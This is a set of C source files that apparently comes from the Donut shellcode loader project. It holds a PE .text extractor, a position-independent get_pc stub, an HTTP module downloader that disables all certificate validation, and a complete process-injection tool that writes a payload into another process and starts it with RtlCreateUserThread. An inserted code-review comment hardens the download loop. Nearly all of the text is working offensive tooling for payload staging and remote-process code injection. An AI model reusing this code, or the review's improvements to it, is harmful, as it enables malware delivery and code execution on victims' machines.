183 | if((i+1) != len) fprintf(fd, ", "); | |
184 | } | |
185 | fprintf(fd, "};\n\n"); | |
186 | fclose(fd); | |
187 | printf(" [ saved code to %s\n", file); | |
188 | } else printf(" [ unable to create file : %s\n", file); | |
189 | } | |
190 | ||
191 | /** | |
192 | void bin2array(void *map, char *fname, void *bin, uint32_t len) { | |
193 | char label[32], file[32], *str; | |
194 | uint32_t i; | |
195 | uint32_t *p=(uint32_t*)bin; | |
196 | FILE *fd; | |
197 | ||
198 | memset(label, 0, sizeof(label)); | |
199 | memset(file, 0, sizeof(file)); | |
200 | ||
201 | #if defined(WINDOWS) | |
202 | str = PathFindFileName(fname); | |
203 | #else | |
204 | str = basename(fname); | |
205 | #endif | |
206 | for(i=0; str[i] != 0 && i < 16;i++) { | |
207 | if(str[i] == '.') { | |
208 | file[i] = label[i] = '_'; | |
209 | } else { | |
210 | label[i] = toupper(str[i]); | |
211 | file[i] = tolower(str[i]); | |
212 | } | |
213 | } | |
214 | ||
215 | strcat(file, ".h"); | |
216 | ||
217 | fd = fopen(file, "wb"); | |
218 | ||
219 | if(fd != NULL) { | |
220 | // align up by 4 | |
221 | len = (len & -4) + 4; | |
222 | len >>= 2; | |
223 | ||
224 | // declare the array | |
225 | fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len); | |
226 | ||
227 | // initialize array | |
228 | for(i=0; i<len; i++) { | |
229 | fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]); | |
230 | } | |
231 | fclose(fd); | |
232 | printf(" [ Saved array to %s\n", file); | |
233 | } else printf(" [ unable to create file : %s\n", file); | |
234 | } | |
235 | */ | |
236 | // structure of COFF (.obj) file | |
237 | ||
238 | //--------------------------// | |
239 | // IMAGE_FILE_HEADER // | |
240 | //--------------------------// | |
241 | // IMAGE_SECTION_HEADER // | |
242 | // * num sections // | |
243 | //--------------------------// | |
244 | // // | |
245 | // // | |
246 | // // | |
247 | // section data // | |
248 | // * num sections // | |
249 | // // | |
250 | // // | |
251 | //--------------------------// | |
252 | // IMAGE_SYMBOL // | |
253 | // * num symbols // | |
254 | //--------------------------// | |
255 | // string table // | |
256 | //--------------------------// | |
257 | ||
258 | int main (int argc, char *argv[]) { | |
259 | int fd, i; | |
260 | struct stat fs; | |
261 | uint8_t *map, *cs; | |
262 | PIMAGE_SECTION_HEADER sh; | |
263 | //PIMAGE_FILE_HEADER fh; | |
264 | //PIMAGE_COFF_SYMBOLS_HEADER csh; | |
265 | uint32_t ofs, len; | |
266 | ||
267 | if (argc != 2) { | |
268 | printf ("\n [ usage: file2h <file.exe | file.bin>\n"); | |
269 | return 0; | |
270 | } | |
271 | ||
272 | // open file for reading | |
273 | fd = open(argv[1], O_RDONLY); | |
274 | ||
275 | if(fd == 0) { | |
276 | printf(" [ unable to open %s\n", argv[1]); | |
277 | return 0; | |
278 | } | |
279 | // if file has some data | |
280 | if(fstat(fd, &fs) == 0) { | |
281 | // map into memory | |
282 | map = (uint8_t*)mmap(NULL, fs.st_size, | |
283 | PROT_READ, MAP_PRIVATE, fd, 0); | |
284 | if(map != NULL) { | |
285 | if(valid_dos_hdr(map) && valid_nt_hdr(map)) { | |
286 | printf(" [ Found valid DOS and NT header.\n"); | |
287 | // get the .text section | |
288 | sh = SecHdr(map); | |
289 | // if a section header was returned | |
290 | if(sh != NULL) { | |
291 | printf(" [ Locating .text section.\n"); | |
292 | // locate the .text section | |
293 | for(i=0; i<SecSize(map); i++) { | |
294 | if(strcmp((char*)sh[i].Name, ".text") == 0) { | |
295 | ofs = rva2ofs(map, sh[i].VirtualAddress); | |
296 | ||
297 | if(ofs != -1) { | |
298 | cs = (map + ofs); | |
299 | len = sh[i].Misc.VirtualSize; | |
300 | // convert to header file | |
301 | bin2h(map, argv[1], cs, len); | |
302 | break; | |
303 | } | |
304 | } | |
305 | } | |
306 | } | |
307 | } else { | |
308 | printf(" [ No valid DOS or NT header found.\n"); | |
309 | // treat file as binary | |
310 | bin2h(NULL, argv[1], map, fs.st_size); | |
311 | //bin2array(NULL, argv[1], map, fs.st_size); | |
312 | } | |
313 | munmap(map, fs.st_size); | |
314 | } | |
315 | } | |
316 | close(fd); | |
317 | return 0; | |
318 | } |
0 | /* mmap() replacement for Windows | |
1 | * | |
2 | * Author: Mike Frysinger <[email protected]> | |
3 | * Placed into the public domain | |
4 | */ | |
5 | ||
6 | /* References: | |
7 | * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx | |
8 | * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx | |
9 | * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx | |
10 | * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx | |
11 | */ | |
12 | ||
13 | #include "mmap.h" | |
14 | ||
15 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset) | |
16 | { | |
17 | if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC)) | |
18 | return MAP_FAILED; | |
19 | if (fd == -1) { | |
20 | if (!(flags & MAP_ANON) || offset) | |
21 | return MAP_FAILED; | |
22 | } else if (flags & MAP_ANON) | |
23 | return MAP_FAILED; | |
24 | ||
25 | DWORD flProtect; | |
26 | if (prot & PROT_WRITE) { | |
27 | if (prot & PROT_EXEC) | |
28 | flProtect = PAGE_EXECUTE_READWRITE; | |
29 | else | |
30 | flProtect = PAGE_READWRITE; | |
31 | } else if (prot & PROT_EXEC) { | |
32 | if (prot & PROT_READ) | |
33 | flProtect = PAGE_EXECUTE_READ; | |
34 | else if (prot & PROT_EXEC) | |
35 | flProtect = PAGE_EXECUTE; | |
36 | } else | |
37 | flProtect = PAGE_READONLY; | |
38 | ||
39 | off_t end = length + offset; | |
40 | HANDLE mmap_fd, h; | |
41 | if (fd == -1) | |
42 | mmap_fd = INVALID_HANDLE_VALUE; | |
43 | else | |
44 | mmap_fd = (HANDLE)_get_osfhandle(fd); | |
45 | h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL); | |
46 | if (h == NULL) | |
47 | return MAP_FAILED; | |
48 | ||
49 | DWORD dwDesiredAccess; | |
50 | if (prot & PROT_WRITE) | |
51 | dwDesiredAccess = FILE_MAP_WRITE; | |
52 | else | |
53 | dwDesiredAccess = FILE_MAP_READ; | |
54 | if (prot & PROT_EXEC) | |
55 | dwDesiredAccess |= FILE_MAP_EXECUTE; | |
56 | if (flags & MAP_PRIVATE) | |
57 | dwDesiredAccess |= FILE_MAP_COPY; | |
58 | void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length); | |
59 | if (ret == NULL) { | |
60 | CloseHandle(h); | |
61 | ret = MAP_FAILED; | |
62 | } | |
63 | return ret; | |
64 | } | |
65 | ||
66 | void munmap(void *addr, size_t length) | |
67 | { | |
68 | UnmapViewOfFile(addr); | |
69 | /* ruh-ro, we leaked handle from CreateFileMapping() ... */ | |
70 | } | |
71 | ||
72 | #undef DWORD_HI | |
73 | #undef DWORD_LO |
0 | ||
1 | ||
2 | #ifndef MMAP_H | |
3 | #define MMAP_H | |
4 | ||
5 | #include <io.h> | |
6 | #include <windows.h> | |
7 | #include <sys/types.h> | |
8 | ||
9 | #define PROT_READ 0x1 | |
10 | #define PROT_WRITE 0x2 | |
11 | /* This flag is only available in WinXP+ */ | |
12 | #ifdef FILE_MAP_EXECUTE | |
13 | #define PROT_EXEC 0x4 | |
14 | #else | |
15 | #define PROT_EXEC 0x0 | |
16 | #define FILE_MAP_EXECUTE 0 | |
17 | #endif | |
18 | ||
19 | #define MAP_SHARED 0x01 | |
20 | #define MAP_PRIVATE 0x02 | |
21 | #define MAP_ANONYMOUS 0x20 | |
22 | #define MAP_ANON MAP_ANONYMOUS | |
23 | #define MAP_FAILED ((void *) -1) | |
24 | ||
25 | #ifdef __USE_FILE_OFFSET64 | |
26 | # define DWORD_HI(x) (x >> 32) | |
27 | # define DWORD_LO(x) ((x) & 0xffffffff) | |
28 | #else | |
29 | # define DWORD_HI(x) (0) | |
30 | # define DWORD_LO(x) (x) | |
31 | #endif | |
32 | ||
33 | #ifdef __cplusplus | |
34 | extern "C" { | |
35 | #endif | |
36 | ||
37 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset); | |
38 | void munmap(void *addr, size_t length); | |
39 | ||
40 | #ifdef __cplusplus | |
41 | } | |
42 | #endif | |
43 | ||
44 | #endif⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // Function to return the program counter. | |
32 | // Always place this at the end of payload. | |
33 | // Tested with x86 build of MSVC 2019 and MinGW. YMMV. | |
34 | #if defined(_MSC_VER) | |
35 | #if defined(_M_IX86) | |
36 | __declspec(naked) char *get_pc(void) { | |
37 | __asm { | |
38 | call pc_addr | |
39 | pc_addr: | |
40 | pop eax | |
41 | sub eax, 5 | |
42 | ret | |
43 | } | |
44 | } | |
45 | #endif | |
46 | #elif defined(__GNUC__) | |
47 | #if defined(__i386__) | |
48 | asm ( | |
49 | ".global get_pc\n" | |
50 | ".global _get_pc\n" | |
51 | "_get_pc:\n" | |
52 | "get_pc:\n" | |
53 | " call pc_addr\n" | |
54 | "pc_addr:\n" | |
55 | " pop %eax\n" | |
56 | " sub $5, %eax\n" | |
57 | " ret\n" | |
58 | ); | |
59 | #endif | |
60 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | BOOL DownloadModule(PDONUT_INSTANCE inst) { | |
32 | HINTERNET hin, con, req; | |
33 | PBYTE buf; | |
34 | DWORD s, n, rd, len, code=0; | |
35 | BOOL bResult = FALSE, bSecure = FALSE; | |
36 | URL_COMPONENTS uc; | |
37 | CHAR host[DONUT_MAX_URL], | |
38 | file[DONUT_MAX_URL]; | |
39 | ||
40 | // default flags for HTTP client | |
41 | DWORD flags = INTERNET_FLAG_KEEP_CONNECTION | | |
42 | INTERNET_FLAG_NO_CACHE_WRITE | | |
43 | INTERNET_FLAG_NO_UI | | |
44 | INTERNET_FLAG_RELOAD | | |
45 | INTERNET_FLAG_NO_AUTO_REDIRECT; | |
46 | ||
47 | Memset(&uc, 0, sizeof(uc)); | |
48 | ||
49 | uc.dwStructSize = sizeof(uc); | |
50 | uc.lpszHostName = host; | |
51 | uc.lpszUrlPath = file; | |
52 | uc.dwHostNameLength = DONUT_MAX_URL; | |
53 | uc.dwUrlPathLength = DONUT_MAX_URL; | |
54 | ||
55 | DPRINT("Decoding URL %s", inst->http.url); | |
56 | ||
57 | if(!inst->api.InternetCrackUrl( | |
58 | inst->http.url, 0, ICU_DECODE, &uc)) { | |
59 | return FALSE; | |
60 | } | |
61 | ||
62 | bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS); | |
63 | ||
64 | // if secure connection, update the flags to ignore | |
65 | // invalid certificates | |
66 | if(bSecure) { | |
67 | flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID | | |
68 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | | |
69 | INTERNET_FLAG_SECURE; | |
70 | } | |
71 | ||
72 | DPRINT("Initializing WININET"); | |
73 | ||
74 | hin = inst->api.InternetOpen( | |
75 | NULL, INTERNET_OPEN_TYPE_PRECONFIG, | |
76 | NULL, NULL, 0); | |
77 | ||
78 | if(hin == NULL) return FALSE; | |
79 | ||
80 | DPRINT("Creating %s connection for %s", | |
81 | bSecure ? "HTTPS" : "HTTP", host); | |
82 | ||
83 | con = inst->api.InternetConnect( | |
84 | hin, host, | |
85 | bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT, | |
86 | NULL, NULL, | |
87 | INTERNET_SERVICE_HTTP, 0, 0); | |
88 | ||
89 | if(con != NULL) { | |
90 | DPRINT("Creating HTTP %s request for %s", | |
91 | inst->http.req, file); | |
92 | ||
93 | req = inst->api.HttpOpenRequest( | |
94 | con, inst->http.req, | |
95 | file, NULL, NULL, NULL, flags, 0); | |
96 | ||
97 | if(req != NULL) { | |
98 | ||
99 | // see if we should ignore invalid certificates for this request | |
100 | if(bSecure) { | |
101 | if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) { | |
102 | n = sizeof (s); | |
103 | ||
104 | s = SECURITY_FLAG_IGNORE_UNKNOWN_CA | | |
105 | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | | |
106 | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | | |
107 | SECURITY_FLAG_IGNORE_WRONG_USAGE | | |
108 | SECURITY_FLAG_IGNORE_REVOCATION; | |
109 | ||
110 | DPRINT("Setting option to ignore invalid certificates"); | |
111 | ||
112 | inst->api.InternetSetOption( | |
113 | req, | |
114 | INTERNET_OPTION_SECURITY_FLAGS, | |
115 | &s, | |
116 | sizeof(s)); | |
117 | } | |
118 | } | |
119 | DPRINT("Sending request"); | |
120 | ||
121 | if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) { | |
122 | len = sizeof(DWORD); | |
123 | code = 0; | |
124 | DPRINT("Querying status code"); | |
125 | ||
126 | if(inst->api.HttpQueryInfo( | |
127 | req, | |
128 | HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, | |
129 | &code, &len, 0)) | |
130 | { | |
131 | DPRINT("Code is %ld", code); | |
132 | ||
133 | if(code == HTTP_STATUS_OK) { | |
134 | DPRINT("Querying content length"); | |
135 | ||
136 | len = sizeof(SIZE_T); | |
137 | inst->mod_len = 0; | |
138 | ||
139 | if(inst->api.HttpQueryInfo( | |
140 | req, | |
141 | HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, | |
142 | &inst->mod_len, &len, 0)) | |
143 | { | |
144 | if(inst->mod_len != 0) { | |
145 | DPRINT("Allocating memory for module"); | |
146 | ||
147 | inst->module.p = inst->api.VirtualAlloc( | |
148 | NULL, inst->mod_len, | |
149 | MEM_COMMIT | MEM_RESERVE, | |
150 | PAGE_READWRITE); | |
151 | ||
152 | if(inst->module.p != NULL) { | |
153 | rd = 0; | |
154 | DPRINT("Downloading module into memory"); | |
155 | bResult = inst->api.InternetReadFile( | |
156 | req, | |
157 | inst->module.p, | |
158 | inst->mod_len, &rd); | |
159 | } | |
160 | } | |
161 | } | |
162 | } | |
163 | } | |
164 | } | |
165 | DPRINT("Closing request handle"); | |
166 | inst->api.InternetCloseHandle(req); | |
167 | } | |
168 | DPRINT("Closing HTTP connection"); | |
169 | inst->api.InternetCloseHandle(con); | |
170 | } | |
171 | DPRINT("Closing internet handle"); | |
172 | inst->api.InternetCloseHandle(hin); | |
173 | ||
174 | #if !defined(NOCRYPTO) | |
175 | if(bResult) { | |
176 | PDONUT_MODULE mod = inst->module.p; | |
177 | ||
178 | DPRINT("Decrypting %lli bytes of module", inst->mod_len); | |
179 | ||
180 | donut_decrypt(inst->mod_key.mk, | |
181 | inst->mod_key.ctr, | |
182 | mod, | |
183 | inst->mod_len); | |
184 | ||
185 | DPRINT("Generating hash to verify decryption"); | |
186 | ULONG64 mac = maru(inst->sig, inst->iv); | |
187 | ||
188 | DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac); | |
189 | ||
190 | if(mac != mod->mac) { | |
191 | DPRINT("Decryption failed"); | |
192 | return FALSE; | |
193 | } | |
194 | } | |
195 | #endif | |
196 | return bResult; | |
197 | }⏎ |
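Review bot: The download at lines 155-158 is a single `InternetReadFile` call whose byte count `rd` is never compared with `inst->mod_len`, so a short read — which `InternetReadFile` may legitimately return for a large body — leaves the tail of the `VirtualAlloc`'d buffer as zero-fill that is then decrypted and, if the key check passes, handed on to the loader. The read should loop until `mod_len` bytes have arrived and set `bResult` to FALSE otherwise; `mod_len` also appears to be wider than the DWORD `InternetReadFile` takes (it is printed with `%lli` on line 178), so the narrowing should be an explicit cast. Separately, lines 67-69 and 104-108 turn off every certificate check (unknown CA, revocation, CN and date), while the only post-download verification at lines 186-190 compares `mod->mac` against `maru(inst->sig, inst->iv)`, which looks like a check that the key decrypted the header rather than an integrity check over the body — confirm against the module layout, but if so, anyone who can interpose on the connection can flip bits in the CTR-decrypted module undetected, and a comment should state that the transport is assumed to be operator-controlled. The rewritten read loop follows.
```c
// … unchanged: URL parsing, connection setup, status and Content-Length queries …
if(inst->module.p != NULL) {
    DWORD total = 0;
    DPRINT("Downloading module into memory");
    // InternetReadFile may return fewer bytes than requested;
    // keep reading until the whole Content-Length is in memory.
    for(;;) {
        rd = 0;
        if(!inst->api.InternetReadFile(req,
            (PBYTE)inst->module.p + total,
            (DWORD)inst->mod_len - total, &rd)) break;
        if(rd == 0) break;                 // end of stream
        total += rd;
        if(total == (DWORD)inst->mod_len) break;
    }
    // a truncated module must never be decrypted or executed
    bResult = (total == (DWORD)inst->mod_len);
}
```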
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <Windows.h> | |
32 | #include <stdio.h> | |
33 | #include <tlhelp32.h> | |
34 | ||
35 | #pragma comment(lib, "advapi32.lib") | |
36 | #pragma comment(lib, "shell32.lib") | |
37 | #pragma comment(lib, "user32.lib") | |
38 | ||
39 | typedef struct _CLIENT_ID { | |
40 | PVOID UniqueProcess; | |
41 | PVOID UniqueThread; | |
42 | } CLIENT_ID, *PCLIENT_ID; | |
43 | ||
44 | typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) ( | |
45 | IN HANDLE ProcessHandle, | |
46 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, | |
47 | IN BOOLEAN CreateSuspended, | |
48 | IN ULONG StackZeroBits, | |
49 | IN OUT PULONG StackReserved, | |
50 | IN OUT PULONG StackCommit, | |
51 | IN PVOID StartAddress, | |
52 | IN PVOID StartParameter OPTIONAL, | |
53 | OUT PHANDLE ThreadHandle, | |
54 | OUT PCLIENT_ID ClientID); | |
55 | ||
56 | BOOL EnablePrivilege(PCHAR szPrivilege){ | |
57 | HANDLE hToken; | |
58 | BOOL bResult; | |
59 | LUID luid; | |
60 | TOKEN_PRIVILEGES tp; | |
61 | ||
62 | // open token for current process | |
63 | bResult = OpenProcessToken(GetCurrentProcess(), | |
64 | TOKEN_ADJUST_PRIVILEGES, &hToken); | |
65 | ||
66 | if(!bResult) return FALSE; | |
67 | ||
68 | // lookup privilege | |
69 | bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid); | |
70 | if(bResult){ | |
71 | tp.PrivilegeCount = 1; | |
72 | tp.Privileges[0].Luid = luid; | |
73 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; | |
74 | ||
75 | // adjust token | |
76 | bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL); | |
77 | } | |
78 | CloseHandle(hToken); | |
79 | return bResult; | |
80 | } | |
81 | ||
82 | // display error message for last error code | |
83 | VOID xstrerror (PCHAR fmt, ...){ | |
84 | PCHAR error=NULL; | |
85 | va_list arglist; | |
86 | CHAR buffer[1024]; | |
87 | DWORD dwError=GetLastError(); | |
88 | ||
89 | va_start(arglist, fmt); | |
90 | vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist); | |
91 | va_end (arglist); | |
92 | ||
93 | if (FormatMessage ( | |
94 | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, | |
95 | NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), | |
96 | (LPSTR)&error, 0, NULL)) | |
97 | { | |
98 | printf(" [ %s : %s\n", buffer, error); | |
99 | LocalFree (error); | |
100 | } else { | |
101 | printf(" [ %s error : %08lX\n", buffer, dwError); | |
102 | } | |
103 | } | |
104 | ||
105 | DWORD name2pid(PCHAR procName){ | |
106 | HANDLE hSnap; | |
107 | PROCESSENTRY32 pe32; | |
108 | DWORD pid=0; | |
109 | ||
110 | // create snapshot of system | |
111 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
112 | if(hSnap == INVALID_HANDLE_VALUE) return 0; | |
113 | ||
114 | pe32.dwSize = sizeof(PROCESSENTRY32); | |
115 | ||
116 | // get first process | |
117 | if(Process32First(hSnap, &pe32)){ | |
118 | do { | |
119 | if(!lstrcmpi(pe32.szExeFile, procName)){ | |
120 | pid=pe32.th32ProcessID; | |
121 | break; | |
122 | } | |
123 | } while(Process32Next(hSnap, &pe32)); | |
124 | } | |
125 | CloseHandle(hSnap); | |
126 | return pid; | |
127 | } | |
128 | ||
129 | BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) { | |
130 | SIZE_T wr; | |
131 | HANDLE hp,ht; | |
132 | LPVOID cs; | |
133 | RtlCreateUserThread_t pRtlCreateUserThread; | |
134 | HMODULE hn; | |
135 | CLIENT_ID cid; | |
136 | NTSTATUS nt=~0UL; | |
137 | DWORD t; | |
138 | ||
139 | // 1. resolve API address | |
140 | hn = GetModuleHandle("ntdll.dll"); | |
141 | pRtlCreateUserThread=(RtlCreateUserThread_t) | |
142 | GetProcAddress(hn, "RtlCreateUserThread"); | |
143 | ||
144 | printf(" [ opening process %li\n", id); | |
145 | // 2. open the target process | |
146 | hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id); | |
147 | ||
148 | if(hp == NULL) return FALSE; | |
149 | ||
150 | // 3. allocate executable-read-write (XRW) memory for payload | |
151 | printf(" [ allocating memory for payload.\n"); | |
152 | cs=VirtualAllocEx(hp, NULL, codeLen, | |
153 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
154 | ||
155 | printf(" [ writing code to %p.\n", cs); | |
156 | // 4. copy the payload to remote memory | |
157 | WriteProcessMemory(hp, cs, code, codeLen, &wr); | |
158 | VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t); | |
159 | ||
160 | printf(" [ press any key to continue.\n"); | |
161 | getchar(); | |
162 | ||
163 | // 5. execute payload in remote process | |
164 | printf(" [ creating new thread.\n"); | |
165 | nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, | |
166 | NULL, cs, NULL, &ht, &cid); | |
167 | ||
168 | printf(" [ nt status is %lx\n", nt); | |
169 | WaitForSingleObject(ht, INFINITE); | |
170 | ||
171 | // 6. close remote thread handle | |
172 | CloseHandle(ht); | |
173 | ||
174 | // 7. free remote memory | |
175 | printf(" [ freeing memory.\n"); | |
176 | VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT); | |
177 | ||
178 | // 8. close remote process handle | |
179 | CloseHandle(hp); | |
180 | return nt == 0; // STATUS_SUCCESS | |
181 | } | |
182 | ||
183 | DWORD getdata(PCHAR path, LPVOID *data){ | |
184 | HANDLE hf; | |
185 | DWORD len,rd=0; | |
186 | ||
187 | // 1. open the file | |
188 | hf=CreateFile(path, GENERIC_READ, 0, 0, | |
189 | OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); | |
190 | ||
191 | if(hf!=INVALID_HANDLE_VALUE){ | |
192 | // get file size | |
193 | len=GetFileSize(hf, 0); | |
194 | // allocate memory | |
195 | *data=malloc(len + 16); | |
196 | // read file contents into memory | |
197 | ReadFile(hf, *data, len, &rd, 0); | |
198 | CloseHandle(hf); | |
199 | } | |
200 | return rd; | |
201 | } | |
202 | ||
203 | int main(int argc, char *argv[]){ | |
204 | LPVOID code; | |
205 | SIZE_T code_len; | |
206 | DWORD pid; | |
207 | ||
208 | if (argc != 3){ | |
209 | printf("\n [ usage: inject <process id | process name> <payload.bin>\n"); | |
210 | return 0; | |
211 | } | |
212 | ||
213 | if(!EnablePrivilege(SE_DEBUG_NAME)) { | |
214 | printf(" [ cannot enable SeDebugPrivilege.\n"); | |
215 | } | |
216 | ||
217 | // get pid | |
218 | pid=atoi(argv[1]); | |
219 | if(pid==0) pid=name2pid(argv[1]); | |
220 | ||
221 | if(pid==0) { | |
222 | printf(" [ unable to obtain process id.\n"); | |
223 | return 0; | |
224 | } | |
225 | // pic | |
226 | code_len = getdata(argv[2], &code); | |
227 | if(code_len == 0) { | |
228 | printf(" [ unable to read payload.\n"); | |
229 | return 0; | |
230 | } | |
231 | injectPIC(pid, code, code_len); | |
232 | free(code); | |
233 | return 0; | |
234 | } |
